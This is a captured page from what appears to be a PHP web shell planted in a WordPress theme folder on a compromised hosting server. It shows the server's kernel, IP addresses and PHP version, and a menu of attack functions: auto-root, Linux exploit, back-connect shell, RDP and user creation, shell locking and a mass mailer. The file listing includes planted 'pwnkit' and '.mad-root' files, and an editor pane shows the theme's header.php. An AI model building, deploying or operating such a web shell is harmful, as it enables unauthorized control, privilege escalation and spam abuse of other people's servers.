Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
themes /
nature-one /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
799
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
archive.php
868
B
-rw-r--r--
category.php
1019
B
-rw-r--r--
change_log.txt
574
B
-rw-r--r--
comments.php
3.06
KB
-rw-r--r--
content-home.php
987
B
-rw-r--r--
content-index.php
174.94
KB
-rw-r--r--
content-page.php
610
B
-rw-r--r--
content-single.php
1.6
KB
-rw-r--r--
content.php
4.01
KB
-rw-r--r--
editor-style.css
139
B
-rw-r--r--
footer.php
3
KB
-rw-r--r--
functions.php
11
KB
-rw-r--r--
functionsbak.php
10.51
KB
-rw-r--r--
header.php
6.17
KB
-rw-r--r--
image.php
3.81
KB
-rw-r--r--
index.php
15.05
KB
-rw-r--r--
license.txt
34.32
KB
-rw-r--r--
logo.jpg
174.94
KB
-rw-r--r--
no-results.php
997
B
-rw-r--r--
options.php
28.4
KB
-rw-r--r--
page.php
1.96
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
3.12
KB
-rw-r--r--
screenshot.png
626.52
KB
-rw-r--r--
search.php
976
B
-rw-r--r--
searchform.php
678
B
-rw-r--r--
sidebar-page.php
422
B
-rw-r--r--
sidebar.php
1.03
KB
-rw-r--r--
single.php
871
B
-rw-r--r--
style.css
31.25
KB
-rw-r--r--
template-blog-post.php
1.05
KB
-rw-r--r--
template-full-width.php
1.73
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : header.php
<?php /** * The Header for our theme. * * Displays all of the <head> section and everything up till <div id="content"> * * @package SKT Nature One */ ?><!DOCTYPE html> <html <?php language_attributes(); ?>> <head> <meta charset="<?php bloginfo( 'charset' ); ?>"> <meta name="viewport" content="width=device-width"> <link rel="profile" href="http://gmpg.org/xfn/11"> <link rel="pingback" href="<?php bloginfo( 'pingback_url' ); ?>"> <?php wp_head(); ?> </head> <body <?php body_class(); ?>> <?php if ( (of_get_option('innerpageslider', true) != 'hide') || is_home() || is_front_page() ) { ?> <div class="slider-wrapper"> <?php if ( of_get_option('slide1', true) == 1 ){ ?> <div id="slider" class="nivoSlider"> <img src="<?php echo get_template_directory_uri(); ?>/images/slides/slider1.jpg" /> </div> <div id="slidecaption1" class="nivo-html-caption" style="display:block;"> <div class="slide_info" style="top:-160px;z-index:99"> <h2><?php _e('Natureone WordPress Theme','nature-one'); ?></h2> <p><?php _e('Go to Appearance > Theme Options > Restore Defaults to setup the homepage','skt-naturone'); ?></p> </div> </div> </div> <?php } else { $slAr = array(); $m = 0; for ($i=1; $i<4; $i++) { if ( of_get_option('slide'.$i, true) != "" ) { $imgSrc = of_get_option('slide'.$i, true); $imgTitle = of_get_option('slidetitle'.$i, true); $imgDesc = of_get_option('slidedesc'.$i, true); if ( strlen($imgSrc) > 3 ) { $slAr[$m]['image_src'] = of_get_option('slide'.$i, true); $slAr[$m]['image_title'] = of_get_option('slidetitle'.$i, true); $slAr[$m]['image_desc'] = of_get_option('slidedesc'.$i, true); $m++; } } } $slideno = array(); if( $slAr > 0 ){ $n = 0;?> <div id="slider" class="nivoSlider"> <?php foreach( $slAr as $sv ){ $n++; ?><img src="<?php echo esc_url($sv['image_src']); ?>" alt="<?php echo esc_attr($sv['image_title']);?>" title="<?php if ( ($sv['image_title']!='') && ($sv['image_desc']!='') ) { echo esc_attr('#slidecaption'.$n) ; } ?>"/><?php $slideno[] = $n; } ?> </div><?php foreach( $slideno as $sln ){ ?> <div id="slidecaption<?php echo $sln; ?>" class="nivo-html-caption"> <div class="slide_info"> <?php if( of_get_option('slidetitle'.$sln, true) != '' ){ ?> <h2><?php echo esc_html(of_get_option('slidetitle'.$sln, true)); ?></h2> <?php } ?> <?php if( of_get_option('slidedesc'.$sln, true) != '' ){ ?> <p><?php echo esc_html(of_get_option('slidedesc'.$sln, true)); ?></p> <?php } ?> </div> </div><?php } ?> </div> <div class="clear"></div><?php } ?> </div> <?php } } else { ?> <div id="slider-page"> <?php if( is_single() || is_archive() || is_category() || is_404()) { ?> <img src="<?php echo esc_url(get_template_directory_uri().'/images/about-banner.jpg'); ?>" /> <?php } elseif( is_page()) { ?> <?php while( have_posts() ) : the_post(); ?> <?php if( has_post_thumbnail()) { ?> <?php the_post_thumbnail('full'); ?> <?php } else { ?> <img src="<?php echo esc_url(get_template_directory_uri().'/images/about-banner.jpg'); ?>" /> <?php } ?> <?php endwhile; ?> <?php } ?> </div><!-- slider-page --> <div class="feature-shadow"> <img src="<?php echo esc_url(get_template_directory_uri().'/images/innerpage_slide_bg.png'); ?>" /> </div><!-- feature-shadow --> <?php } ?> <div class="header"> <div class="header-inner"> <div class="logo"> <a href="<?php echo esc_url(home_url('/')); ?>"> <?php if( of_get_option( 'logo', true ) != '' ) { if( of_get_option('logo', true) == "http://1"){ echo "<h1>".__('Logo','nature-one')."</h1>"; } else { ; ?> <img src="<?php echo esc_url( of_get_option( 'logo', true )); ?>" / > <?php } } else { ?> <h1><?php bloginfo('name'); ?></h1> <?php bloginfo('description'); ?> <?php } ?> </a> </div><!-- logo --> <div class="toggle"> <a class="toggleMenu" href="#"><?php _e('Menu','nature-one'); ?></a> </div><!-- toggle --> <div class="nav"> <?php wp_nav_menu( array( 'theme_location' => 'primary') ); ?> </div><!-- nav --> <div class="clear"></div> </div><!-- header-inner --> </div><!-- header --> <div class="main-container"> <?php if( function_exists('is_woocommerce') && is_woocommerce() ) { ?> <div class="content-area"> <div class="middle-align content_sidebar"> <div id="sitemain" class="site-main"> <?php } ?>
Close